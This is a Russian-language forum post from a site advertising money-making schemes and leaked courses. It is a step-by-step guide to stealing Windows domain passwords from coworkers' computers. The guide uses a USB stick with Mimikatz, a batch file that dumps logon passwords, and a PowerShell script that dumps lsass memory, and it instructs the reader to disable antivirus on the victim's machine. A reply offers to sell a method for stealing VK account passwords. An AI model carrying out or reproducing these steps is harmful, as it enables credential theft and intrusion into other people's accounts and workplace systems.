• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Вытаскиваем пароли с Windows

Miron_T31

Местный
Сообщения
195
Реакции
160
0 руб.
Вытаскиваем пароли с Windows. Mimikatz.

Не так давно французский разработчик создал программу "Mimikatz" для воровства паролей различными способами. По умолчанию есть возможность воровать пароль из активной сессии или посредством дампа памяти одного процесса.

1) Скачиваем программу.
http://blog.gentilkiwi.com/mimikatz
Выбираем ссылку "binaries". Скачиваем любой архив. На данный момент актуальная версия - 2.0.

2) Подготовка
Нам нужно узнать целевую платформу жертвы. Работает программа только на Windows. Именно нам нужно знать архитектуру процессора: х86 или х64. Как только узнали из распакованного архива заходим в папочку с нужной целевой платформой и копируем все файлы прямо на флешку. Кстати, забыл упомянуть, что взламывать ПК мы будем с помощью флешки. Представьте, что все сотрудники работают на одном домене и для входа на любой аккаунт нужно узнать просто логин пароль, при этом, войти можно на любой ПК под системой Windows. В сериале "Mr. Robot" (2 сез., 9 сер.) используется ПК, на котором сессия активна, но ПК заблокирован. Я точно не уверен, но, скорее всего, на ПК в фоновом режиме запускается autorun, потом запускается в фоновом режиме mimikatz и автоматически вводятся нужные команды, выходная информация которых автоматически сохраняется на флешке. Но, в Mr. Robot используется не просто mimikatz а целые устройства. Подробнее об этом Вы сможете почитать здесь: https://www.hak5.org/blog/15-second-p...

Ниже будут два способа воровства паролей. Думаю, Ваша смекалка позволит их объединить в один, ведь так возможно.

### Как своровать пароли из активной сессии?
Допустим, кто-то ушёл от ПК, и с Вами имеется ваша флешка с mimikatz. ПК остался не заблокированным, но доступ всё-же нам нужен постоянный. Как и ранее, по теории, мы работаем с жертвой в одном домене, и можем залогиниться под любым ПК в сети.

На Вашем ПК:
1) Создаём файл c.bat
2) В нём пишем:
@Echo off
mimikatz "privilege::debug" "sekurlsa::logonPasswords" "exit" > c.txt

На ПК жертвы:
1) Отключаем антивирус на 1 минуту. Зависит от Вашей скорости работы.
2) Подключаем флешку и запускаем c.bat от имени администратора
3) Уже на своём ПК смотрим файл c.txt. В нём будет лог, в котором Вы сможете найти такую инфу, как "login, domain, password" и т.д.

### Как своровать пароли из дампа памяти?
Опять всё по теории как и в первом случае, но, на ПК не удаётся включить необходимый режим для воровства пароля.

На Вашем ПК:
1) В дополнение заходим на флешку, создаём файл под названием "Out-Minidump.ps1" и копируем в него содержимое отсюда: https://raw.githubusercontent.com/mat...
2) Создаём файл под названием "d.ps1". Записываем в него:
new-item -type directory -path $home\Documents\WindowsPowerShell\Modules
Copy-Item Out-Minidump.ps1 $home\Documents\WindowsPowerShell\Modules
import-module $home\Documents\WindowsPowerShell\Modules\Out-Minidump.ps1
Get-Process lsass | Out-Minidump

На ПК жервты:
1) Отключаем антивирус на 1 минуту. Зависит от Вашей скорости работы.
2) Открываем флешку, нажимаем ПКМ (Правая Кнопка Мыши) на файл d.ps1 и нажимаем "Выполнить в PowerShell". В папке появится файл с названием "lsass_XXX.dmp".

На Вашем ПК:
1) Открываем с флешки mimikatz, сначала пишем:
sekurlsa::minidump lsass_XXX.dmp
* где XXX — это номер из названия файла, посмотрите его на флешке
2) И под конец:
sekurlsa::logonPasswords
3) Смотрим пароли, наслаждаемся.
 
Сообщения
842
Реакции
2.008
0 руб.
Telegram
Продам способ вытаскивания паролей логов от вк. 100р.
Причина продажи - окупить покупку.
Брал за 300 в магазине который продает аки вк.
На гаранта согласен.
А правила прочитать не?Или похуй?
 
Сверху Снизу